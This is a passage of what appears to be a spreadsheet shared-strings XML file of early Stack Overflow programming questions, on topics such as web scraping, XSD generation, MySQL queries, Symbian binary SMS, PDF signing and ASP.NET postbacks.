  </si>
  <si>
    <t>Grabbing text from a webpage</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to write a program that will find bus stop times and update my personal webpage accordingly.&lt;/p&gt;
&lt;p&gt;If I were to do this manually I would &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Visit www.calgarytransit.com&lt;/li&gt;
&lt;li&gt;Enter a stop number. ie) 9510&lt;/li&gt;
&lt;li&gt;Click the button "next bus"&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The results may look like the following:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;10:16p    Route 154	 
  10:46p Route 154	
  11:32p    Route 154&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once I've grabbed the time and routes then I will update my webpage accordingly. &lt;/p&gt;
&lt;p&gt;I have no idea where to start. I know diddly squat about web programming but can write some C and Python. What are some topics/libraries I could look into?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2008: Running xsd.exe on schema file gives XMLSchema:datetime is not declared</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a an XSD that looks like this (roughly)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xs:schema id="Appointment" targetNamespace="http://tempuri.org/Record.xsd" elementFormDefault="qualified"
attributeFormDefault="qualified" xmlns="http://tempuri.org/Record.xsd" xmlns:mstns="http://tempuri.org/Record.xsd"
xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"&amp;gt;
&amp;lt;xs:element name="Record" msdata:IsDataSet="true"&amp;gt;
	&amp;lt;xs:complexType&amp;gt;
		&amp;lt;xs:choice maxOccurs="unbounded"&amp;gt;
			&amp;lt;xs:element name="Record"&amp;gt;
				&amp;lt;xs:complexType&amp;gt;
					&amp;lt;xs:sequence&amp;gt;
						&amp;lt;xs:element name="ID" type="xs:string" minOccurs="0" /&amp;gt;
						&amp;lt;xs:element name="TimeStart" type="xs:datetime" minOccurs="0" /&amp;gt;
						&amp;lt;xs:element name="TimeEnd" type="xs:datetime" minOccurs="0" /&amp;gt;
					&amp;lt;/xs:sequence&amp;gt;
				&amp;lt;/xs:complexType&amp;gt;
			&amp;lt;/xs:element&amp;gt;
		&amp;lt;/xs:choice&amp;gt;
	&amp;lt;/xs:complexType&amp;gt;
&amp;lt;/xs:element&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I try to generate classes from it using the xsd.exe from VS2008 I get string fields instead of date fields, and a warning that &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Schema validation warning: Type 'http://www.w3.org/2001/XMLSchema:datetime' is not declared. Line 13, position 9.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any clues?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get the number of rows per day between given dates?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having table in the below format. I need mysql query to get the no of rows perday when i give date between 2008-10-12 and 2008-10-13&lt;/p&gt;
&lt;pre&gt;
 Name | KW     | KV   | I    | Date                |
------+--------+------+------+---------------------+
 UPS1 | 353.50 | NULL | NULL | 2008-10-12 00:54:36 |
 UPS1 | 352.50 | NULL | NULL | 2008-10-12 01:54:36 |
 UPS1 | 351.90 | NULL | NULL | 2008-10-12 02:54:36 |
 UPS1 | 351.60 | NULL | NULL | 2008-10-12 03:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 04:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 05:54:36 |
 UPS1 | 351.90 | NULL | NULL | 2008-10-12 06:54:36 |
 UPS1 | 352.50 | NULL | NULL | 2008-10-12 07:54:36 |
 UPS1 | 352.50 | NULL | NULL | 2008-10-12 08:54:36 |
 UPS1 | 353.20 | NULL | NULL | 2008-10-12 09:54:36 |
 UPS1 | 353.50 | NULL | NULL | 2008-10-12 10:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 11:54:36 |
 UPS1 | 352.50 | NULL | NULL | 2008-10-12 12:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 13:54:36 |
 UPS1 | 353.20 | NULL | NULL | 2008-10-12 14:54:36 |
 UPS1 | 353.50 | NULL | NULL | 2008-10-12 15:54:36 |
 UPS1 | 352.90 | NULL | NULL | 2008-10-12 16:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 17:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 18:54:36 |
 UPS1 | 352.90 | NULL | NULL | 2008-10-12 19:54:36 |
 UPS1 | 352.20 | NULL | NULL | 2008-10-12 20:54:36 |
 UPS1 | 352.50 | NULL | NULL | 2008-10-12 21:54:36 |
 UPS1 | 352.90 | NULL | NULL | 2008-10-12 22:54:36 |
 UPS1 | 353.20 | NULL | NULL | 2008-10-12 23:54:36 |
 UPS1 | 355.80 | NULL | NULL | 2008-10-13 00:54:36 |
 UPS1 | 358.40 | NULL | NULL | 2008-10-13 01:54:36 |
 UPS1 | 358.00 | NULL | NULL | 2008-10-13 02:54:36 |
 UPS1 | 359.00 | NULL | NULL | 2008-10-13 03:54:36 |
 UPS1 | 357.70 | NULL | NULL | 2008-10-13 04:54:36 |
 UPS1 | 357.40 | NULL | NULL | 2008-10-13 05:54:36 |
 UPS1 | 357.40 | NULL | NULL | 2008-10-13 06:54:36 |
 UPS1 | 359.00 | NULL | NULL | 2008-10-13 07:54:36 |
 UPS1 | 357.10 | NULL | NULL | 2008-10-13 08:54:36 |
 UPS1 | 359.00 | NULL | NULL | 2008-10-13 09:54:36 |
 UPS1 | 357.70 | NULL | NULL | 2008-10-13 10:54:36 |
 UPS1 | 357.40 | NULL | NULL | 2008-10-13 11:54:36 |
 UPS1 | 357.40 | NULL | NULL | 2008-10-13 12:54:36 |
 UPS1 | 359.00 | NULL | NULL | 2008-10-13 13:54:36 |
 UPS1 | 357.10 | NULL | NULL | 2008-10-13 14:54:36 |
 UPS1 | 358.00 | NULL | NULL | 2008-10-13 15:54:36 |
 UPS1 | 359.30 | NULL | NULL | 2008-10-13 16:54:36 |
 UPS1 | 357.10 | NULL | NULL | 2008-10-13 17:54:36 |
 UPS1 | 358.40 | NULL | NULL | 2008-10-13 18:54:36 |
 UPS1 | 357.70 | NULL | NULL | 2008-10-13 19:54:36 |
 UPS1 | 359.00 | NULL | NULL | 2008-10-13 20:54:36 |
 UPS1 | 358.70 | NULL | NULL | 2008-10-13 21:54:36 |
 UPS1 | 358.70 | NULL | NULL | 2008-10-13 22:54:36 |
 UPS1 | 358.40 | NULL | NULL | 2008-10-13 23:54:36 |
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Binary SMS in Symbian</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wonder if anyone has managed to create a working code for sending out binary messages (to configure Symbian phones) and have also some binary data sample.
So far all the samples I have found fail to leave the Outbox or never return.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Current entry is the Draft folder.
    iSmsMtm-&amp;gt;SwitchCurrentEntryL( KMsvDraftEntryId );
    // Create a new SMS message entry as a child of the current context.
    iSmsMtm-&amp;gt;CreateMessageL( KUidMsgTypeSMS.iUid );
    CMsvEntry&amp;amp; serverEntry = iSmsMtm-&amp;gt;Entry();
    TMsvEntry entry( serverEntry.Entry() );
    /* Send Binary SMS */
    CSmsHeader &amp;amp;hdr = iSmsMtm-&amp;gt;SmsHeader(); 
    CSmsMessage &amp;amp;msg = hdr.Message(); 
    CSmsPDU &amp;amp;pdu = msg.SmsPDU(); 
    CSmsUserData &amp;amp;userdata = pdu.UserData(); 
    // Set the DCS byte
    pdu.SetBits7To4(TSmsDataCodingScheme::ESmsDCSTextUncompressedWithNoClassInfo);
    pdu.SetAlphabet(TSmsDataCodingScheme::ESmsAlphabet8Bit);
    pdu.SetClass(ETrue, TSmsDataCodingScheme::ESmsClass2);
    char buf[]= {...}; //my binary data, 247 bytes long
    // Construct a dummy message
    HBufC8 * iMessage = HBufC8::NewL(300);
    TPtr8 TempUDHBufDesc((TUint8*)buf,247,247);
    iMessage-&amp;gt;Des().Copy(TempUDHBufDesc);
    _LOGFENTRY1(_L("mess length %d"),iMessage-&amp;gt;Des().Length());
    userdata.SetBodyL(*iMessage); 
    delete iMessage; 
    // Message will be sent immediately.
    entry.SetSendingState( KMsvSendStateWaiting );
    entry.iDate.UniversalTime(); // insert current time //Solution for HomeTime()
    // Set the SMS message settings for the message.
    CSmsHeader&amp;amp; header = iSmsMtm-&amp;gt;SmsHeader();
    CSmsSettings* settings = CSmsSettings::NewL();
    CleanupStack::PushL( settings );
    settings-&amp;gt;CopyL( iSmsMtm-&amp;gt;ServiceSettings() ); // restore settings
    settings-&amp;gt;SetDelivery( ESmsDeliveryImmediately ); // to be delivered immediately
    settings-&amp;gt;SetDeliveryReport(EFalse);
    settings-&amp;gt;SetCharacterSet(TSmsDataCodingScheme::ESmsAlphabet8Bit); // IMPORTANT! For sending binary SMS
    header.SetSmsSettingsL( *settings ); // new settings
    // Let's check if there is a service center address.
    if ( header.Message().ServiceCenterAddress().Length() == 0 )
    {
    	// No, there isn't. We assume there is at least one service center
    	// number set and use the default service center number.
    	CSmsSettings* serviceSettings = &amp;amp;( iSmsMtm-&amp;gt;ServiceSettings() );
    	// Check if number of service center addresses in the list is null.
    	if ( !serviceSettings-&amp;gt;ServiceCenterCount() )
    	{		 _LOGENTRY("No SC");
    		return ; // quit creating the message
    	}
    	else
    	{
    		CSmsNumber* smsCenter= CSmsNumber::NewL();
    		CleanupStack::PushL(smsCenter);
    		smsCenter-&amp;gt;SetAddressL((serviceSettings-&amp;gt;GetServiceCenter( serviceSettings-&amp;gt;DefaultServiceCenter())).Address());
    		header.Message().SetServiceCenterAddressL( smsCenter-&amp;gt;Address() );
    		CleanupStack::PopAndDestroy(smsCenter);
    	}
    }
    CleanupStack::PopAndDestroy( settings );
    // Recipient number is displayed also as the recipient alias.
    entry.iDetails.Set( _L("+3725038xxx") );
    iSmsMtm-&amp;gt;AddAddresseeL( _L("+3725038xxx") , entry.iDetails );
    // Validate message.
    if ( !ValidateL() )
    {	 _LOGENTRY("Not valid");
    	return ;
    }
    entry.SetVisible( ETrue ); // set message as visible
    entry.SetInPreparation( EFalse ); // set together with the visibility flag
    serverEntry.ChangeL( entry ); // commit changes 
    iSmsMtm-&amp;gt;SaveMessageL(); // save message
    TMsvSelectionOrdering selection;
    CMsvEntry* parentEntry = CMsvEntry::NewL( iSmsMtm-&amp;gt;Session(), KMsvDraftEntryId, selection );
    CleanupStack::PushL( parentEntry );
    // Move message to Outbox.
    iOperation =parentEntry-&amp;gt;MoveL( entry.Id(), KMsvGlobalOutBoxIndexEntryId, iStatus );
    CleanupStack::PopAndDestroy( parentEntry );
    iState = EWaitingForMoving;
    SetActive();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Mostly I'm not sure about the correct values for port and class . Also some correct binary string would be nice to have for testing. Now I'm not sure if thecode is bad or the data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I pan the image inside a UIImageView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;UIImageView&lt;/code&gt; that is displaying an image that is wider and taller than the &lt;code&gt;UIImageView&lt;/code&gt; is. I would like to pan the image within the view using an animation (so that the pan is nice and smooth).&lt;/p&gt;
&lt;p&gt;It seems to me that I should be able to just adjust the &lt;code&gt;bounds.origin&lt;/code&gt; of the &lt;code&gt;UIImageView&lt;/code&gt;, and the image should move (because the image should paint inside the view with that as &lt;strong&gt;its&lt;/strong&gt; origin, right?) but that doesn't seem to work. The &lt;code&gt;bounds.origin&lt;/code&gt; changes, but the image draws in the same location.&lt;/p&gt;
&lt;p&gt;What almost works is to change the &lt;code&gt;contentsRect&lt;/code&gt; of the view's layer. But this begins as a unit square, even though the viewable area of the image is not the whole image. So I'm not sure how I would detect that the far edge of the image is being pulled into the viewable area (which I need to avoid, since it displays by stretching the edge out to infinity, which looks, well, sub-par).&lt;/p&gt;
&lt;p&gt;My view currently has its &lt;code&gt;contentsGravity&lt;/code&gt; set to &lt;code&gt;kCAGravityTopLeft&lt;/code&gt; via Interface Builder, if that makes a difference (Is it causing the image to move?). No other options seemed to be any better, though.&lt;/p&gt;
&lt;p&gt;UPDATE: to be clear, I want to move the image &lt;strong&gt;inside&lt;/strong&gt; the view, while keeping the view in the same spot.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>increase clarity of a graph</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using jfreechart for plotting graphs. The problem is that if have more entries on the X-axis, then the X-axis parameters are not visible. How should I solve that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the rules for file extensions in Windows and Unix?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'm currently using File::Basename fileparse to separate out a file's directory, base file name and it's extension using something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;my($myfile_name,$mydirectory, $file_extension) = fileparse($$rhash_params{'storage_full_path_location'},'\..{1,4}');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But see that there's a variation where you can actually provide a array of suffixes to the function, the array would contains all the known file extension.&lt;/p&gt;
&lt;p&gt;So i'm trying to find a safe way to do this as i've seen that i've got some strange file names to process, i.e. file.0f1.htm, etc.&lt;/p&gt;
&lt;h2&gt;Question:&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Is there a list of commonly used
extension for Windows and Unix
systems? But in my case it's mainly
for Windows.  &lt;/li&gt;
&lt;li&gt;And is it safe to
    assume that all file names in
    Windows should have an extension
    ending with three letter characters?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;And if there's an even better way to do this, please share.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
&lt;h2&gt;Updates:&lt;/h2&gt;
&lt;p&gt;So obviously i must be drunk to forgot about those other extension. :)
Thus i've updated the current regex to allow from 1-4chars.&lt;/p&gt;
&lt;p&gt;In this case, how should i change my regex line to properly match it? 
Or is it an even better idea to look for all those commonly used extension from google and put them into an array to be passed to the function instead? My users are usually either students or teachers.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does location.replace() not do a conditional get if last-modified caching is in place?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's what I'm seeing: I have a conditional-get caching policy in place (cache-control: private, must-revalidate).&lt;/p&gt;
&lt;p&gt;It works fine if I'm on the page, then try to hit the browser's refresh button.&lt;/p&gt;
&lt;p&gt;However, in another part of my site, I use location.replace(url) to go to that page... if I do that, its not makign that check and always retrieving the cached version.&lt;/p&gt;
&lt;p&gt;Any tips on what might be wrong here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Digitally sign pdfs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company has a web document management application and I have been assigned to find a way to sign pdf files with the user digital certificate.&lt;/p&gt;
&lt;p&gt;The pdfs can go from a few kb to over 100Mb, this is over the internet so the signature &lt;strong&gt;&lt;em&gt;must&lt;/em&gt;&lt;/strong&gt; take place at the web server.&lt;/p&gt;
&lt;p&gt;In order to do this i have built an activeX control that asks the user to choose the certificate, then uploads it to a webpage using WebClient.UploadData sending the certificate as a byte array.&lt;/p&gt;
&lt;p&gt;On the web page when i'm trying to sign the pdf document i am getting an error "Key does not exist". This comes to no surprise to me because when i was using the certificate directly over an https connection after i choose the proper certificate i would be prompt for the key. This is not happening with the activeX.&lt;/p&gt;
&lt;p&gt;This  is how i'm getting the certificate from the user:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static X509Certificate2 PickCertificate()
        {
            X509Store store = new X509Store(StoreName.My, StoreLocation.CurrentUser);
            try
            {
                store.Open(OpenFlags.ReadOnly);
                // pick a certificate from the store
                X509Certificate2 cert = X509Certificate2UI.SelectFromCollection(store.Certificates, "Title", "Message", X509SelectionFlag.SingleSelection)[0];
                // show certificate details dialog
                X509Certificate2UI.DisplayCertificate(cert);
                store.Close();
                return cert;
            }
            finally { store.Close(); }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I ask the user to provide the key i am missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Post from one controller action to another (not redirect)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an action which I need to post forward onto another action if it meets certain conditions, but I am unable to preserve the form data when passing through to the next action.&lt;/p&gt;
&lt;p&gt;The receiving action accepts a FormCollection, which the sending action &lt;/p&gt;
&lt;p&gt;Currently, I am doing a return RedirectToAction("action","controller", form). And I can determine that the form variable has keys before it redirects (form.HasKeys() = true).&lt;/p&gt;
&lt;p&gt;When the action is hit however, the FormCollection is empty (form.HasKeys() = false).&lt;/p&gt;
&lt;p&gt;Any ideas? Is there a 'PostToAction' method that I am missing?&lt;/p&gt;
&lt;p&gt;FYI: I am using ASP.NET MVC Beta. Many thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; For those who have this problem, please look into the &lt;a href="http://en.wikipedia.org/wiki/Post/Redirect/Get" rel="nofollow"&gt;PRG Pattern&lt;/a&gt;. This is the actual term of what I was looking to do which also enables pretty urls.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Receive a multipart HTTP response</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a Java client application to receive live M-JPEG video from an IP camera. The video is sent by the camera as an endless multipart HTTP message where each part is a single JPEG frame. I need to process each of these frames as they arrive, so I'm hoping there's a way to make an HTTP request that asynchronously triggers an event as each message part/video frame is received.&lt;/p&gt;
&lt;p&gt;Is anyone aware of any libraries that can do this? All the examples I can find on Google won't work because they use blocking calls that only parse the response and break it up into parts after the entire response has finished being received (which obviously won't work for an endless response).&lt;/p&gt;
&lt;p&gt;I realise I could manually break up the data into parts as it arrives by searching for the message boundary but it just feels like I would be reinventing the wheel.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve"> â€˜Remember Meâ€™ Login in CodeIgniter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you implement this in CodeIgniter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to change the row position of virtual mode DataGridView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to change the row position of virtual mode DataGridView?&lt;/p&gt;
&lt;p&gt;I am using &lt;a href="http://en.wikipedia.org/wiki/Windows%5FForms" rel="nofollow"&gt;Windows Forms&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Postback destroys user controls in my GridView columns</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ASP.NET GridView that uses template columns and user controls to allow me to dynamically construct the datagrid. Now I'm implementing the event handler for inserting a row. To do that, I create an array of default values and add it to the data table which is acting as a data source. However, when my OnLoad event is fired on postback, all my template columns no longer have the user controls. My gridview ends up just being all blank with nothing in it and my button column disappears as well (which contains the add row, delete row and save buttons).&lt;/p&gt;
&lt;p&gt;My row add event just does this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public void AddDataGridRow()
    {
        List&amp;lt;object&amp;gt; defRow = new List&amp;lt;object&amp;gt;();
        for (int i = 0; i &amp;lt; fieldNames.Count; i++)
        {
            defRow.Add(GetDefaultValueFromDBType(types[i]));   
        }
        dt.Rows.Add(defRow);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is fired from a button in a user control that's implement like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    protected void Button1_Click(object sender, EventArgs e)
    {
        ((Scoresheet)(this.Page)).AddDataGridRow();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My on load event does a bunch of stuff on first run to set the GridView up but I don't run that again by using the IsPostBack property to tell.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
            Initialize();
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone have any hints as to why my user controls are vanishing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I avoid unwanted log messages on java project?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my java project, I have a bunch of strings externalized on a &lt;code&gt;messages.properties&lt;/code&gt; file.  On its respective &lt;code&gt;Messages.java&lt;/code&gt; file I had the same number of public static String-typed attributes, so I could access those externalized texts.  &lt;/p&gt;
&lt;p&gt;Then, I implemented a method called &lt;code&gt;getString&lt;/code&gt;, which receives the name of the constant as its argument and returns the wanted text.  This way, there is no need to declare all the public static Strings-typed attributes inside the &lt;code&gt;Messages.java&lt;/code&gt; file.&lt;/p&gt;
&lt;p&gt;But after doing this my log became filled with "&lt;em&gt;NLS unused message&lt;/em&gt;" messages.&lt;/p&gt;
&lt;p&gt;Do you know if there's a way to prevent those warning messages to be logged?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Loop through PageField in OLAP Cube [PivotTable]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a VBA script that will draw buttons beside the &lt;code&gt;PageFields&lt;/code&gt; in a Pivot Table, these buttons will loop through the values in the &lt;code&gt;PageField&lt;/code&gt;. I had this working for a regular Pivot Table, but I've been asked to adapt it for an &lt;code&gt;OLAP Cube&lt;/code&gt; (External Data Source) and I can't work out how to find the values for a Member using VBA (for an OLAP Cube).&lt;/p&gt;
&lt;p&gt;Can anyone help?&lt;/p&gt;
&lt;p&gt;Previously I had the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Public Function Next_page(row)
Dim pivTable As PivotTable
Dim pgField As PivotField
Set pivTable = ActiveSheet.PivotTables(1)
For Each pgField In pivTable.PageFields
    If pgField.DataRange.row = CInt(row) Then
        If pgField.CurrentPage.Name = "(All)" Then
            If pgField.PivotItems.Count &amp;gt; 0 Then
                pgField.CurrentPage = pgField.PivotItems(1).Name
            End If
            Exit Function
        End If
        For j = 1 To pgField.PivotItems.Count Step 1
            If pgField.PivotItems(j) = pgField.CurrentPage.Name Then
                If (j &amp;lt; pgField.PivotItems.Count) Then
                    pgField.CurrentPage = pgField.PivotItems(j + 1).Name
                    Exit Function
                End If
            End If
        Next j
        Exit Function
    End If
Next
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But because the &lt;code&gt;CurrentPage&lt;/code&gt; doesn't exist, for an &lt;code&gt;OLAP Cube&lt;/code&gt; it doesn't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lisp: Need help getting correct behaviour from SBCL when converting octet stream to EUC-JP with malformed bytes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The following does not work in this particular case, complaining that whatever you give it is not a character.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(handler-bind ((sb-int:character-coding-error
                 #'(lambda (c)
                      (invoke-restart 'use-value #\?))))
    (sb-ext:octets-to-string *euc-jp* :external-format :euc-jp))&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where &lt;code&gt;*euc-jp*&lt;/code&gt; is a variable containing binary of EUC-JP encoded text.&lt;/p&gt;
&lt;p&gt;I have tried &lt;code&gt;#\KATAKANA_LETTER_NI&lt;/code&gt; as well, instead of #\? and also just "". Nothing has worked so far.&lt;/p&gt;
&lt;p&gt;Any help would be greatly appreciated!&lt;/p&gt;
&lt;p&gt;EDIT: To reproduce &lt;code&gt;*EUC-JP*&lt;/code&gt;, fetch &lt;a href="http://blogs.yahoo.co.jp/akira_w0325/27287392.html" rel="nofollow"&gt;http://blogs.yahoo.co.jp/akira_w0325/27287392.html&lt;/a&gt; using drakma.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Source for useful EC2 AMIs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Amazon's own &lt;a href="http://developer.amazonwebservices.com/connect/entry.jspa?externalID=552&amp;amp;categoryID=187" rel="nofollow"&gt;client libraries&lt;/a&gt; (or &lt;a href="http://code.google.com/p/typica/" rel="nofollow"&gt;alternatives&lt;/a&gt;), you can get listings of available pre-packaged AMIs, but the interface is definitely designed for scriptability, not readability. &lt;a href="http://developer.amazonwebservices.com/connect/entry.jspa?externalID=609" rel="nofollow"&gt;Elasticfox&lt;/a&gt; is better, but still doesn't make it easy to see what an AMI &lt;em&gt;does&lt;/em&gt;, allow for user rating, etc.&lt;/p&gt;
&lt;p&gt;Is there a centralised place for me to easily find AMIs for specific purposes? AMIs for Apache, OpenMQ, MySQL, that sort of thing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ ctor question (linux)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;
&lt;li&gt;&lt;p&gt;environment: linux, userspace-application created via g++ from a couple of C++ files
(result is an ELF)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;there is a problem (SIGSEGV) when traversing the constructor list &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
    ( __CTOR_LIST__ )
&lt;/pre&gt;
&lt;p&gt;(note: code called via this list is a kind of system initialisation for every class, 
  &lt;em&gt;not&lt;/em&gt; the constructor-code I wrote)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;when I understand correctly every compilation unit (every .o created from a .cpp) 
creates one entry in&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
    __CTOR_LIST__ 
&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;the problem (SIGSEGV) does not exist when I step via GDB through the program&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;for debugging this  I'm looking for an way to add own code code &lt;strong&gt;before&lt;/strong&gt; the 
call of &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
    "_do_global_ctors_aux"
&lt;/pre&gt;
&lt;p&gt;any hints for this ?&lt;/p&gt;
&lt;p&gt;thanks,&lt;/p&gt;
&lt;p&gt;Uwe&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why do some URLs contain both numeric id and name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering why the link to profile looks like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/users/ID/NAME
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;not simply:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/users/ID
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or even better:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/users/NAME
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can there be couple users with the same name? Or can one user have many names?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I substitute regexp matches and map the substitutions in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I.e.:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo H#97llo | MagicPerlCommand
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Stdout:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Hallo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;were MagicPerlCommand is something like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;perl -pnle "s/#(\d+)/chr(\1)/ge"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(but that doesn't work).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why did the designers of ColdFusion decide to index arrays from 1 rather than 0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just curious about this really, does anyone know why they broke convention on this one? &lt;/p&gt;
&lt;p&gt;Thanks,
Ciaran&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL 2005: should I roll my own log shipping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking into using log shipping for disaster recovery and I'm getting mixed messages about whether to use the built-in stuff or roll my own. Which do you recommend, please, and if you favour rolling your own what's wrong with the built-in stuff? If I'm going to reinvent the wheel I don't want to make the same mistakes! (We have the Workgroup edition.) Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Guidelines for Using Brushes and Pens</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How expensive is it to create gdi brushes and pens? Should I create them on an add needed basis and wrap them in a using so they are disposed quickly, or should I create a static class similar to System.Drawing.Brushes class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to store IPv6-compatible address in a relational database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I do that?&lt;/p&gt;
&lt;p&gt;Right now, IPv6 will not be used, but I need to design the application to make it IPv6-ready. It is necessary to store IP addresses and CIDR blocks (also BGP NLRI, but this is another story) in a MySQL database. I've alway used an INT for IPv4 + a TINYINT for masklen, but IPv6 is 128 bit.&lt;/p&gt;
&lt;p&gt;What approach will be best for that? &lt;code&gt;2xBIGINT&lt;/code&gt;? &lt;code&gt;CHAR(16)&lt;/code&gt; for binary storage? &lt;code&gt;CHAR(39)&lt;/code&gt; for text storage? &lt;code&gt;8xSMALLINT&lt;/code&gt; in a dedicated table?&lt;/p&gt;
&lt;p&gt;What would you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Primary servers in capistrano</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a task in capistrano wherein I want just a single line to run only if the server is a marked as primary.  Is there a variable or method that I can reference inside a task?  'primary?' or 'primary' doesn't seem to work.&lt;/p&gt;
&lt;p&gt;I've also tried something akin to the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;after "deploy", "task1"
after "deploy", "task2"
after "deploy", "task3"
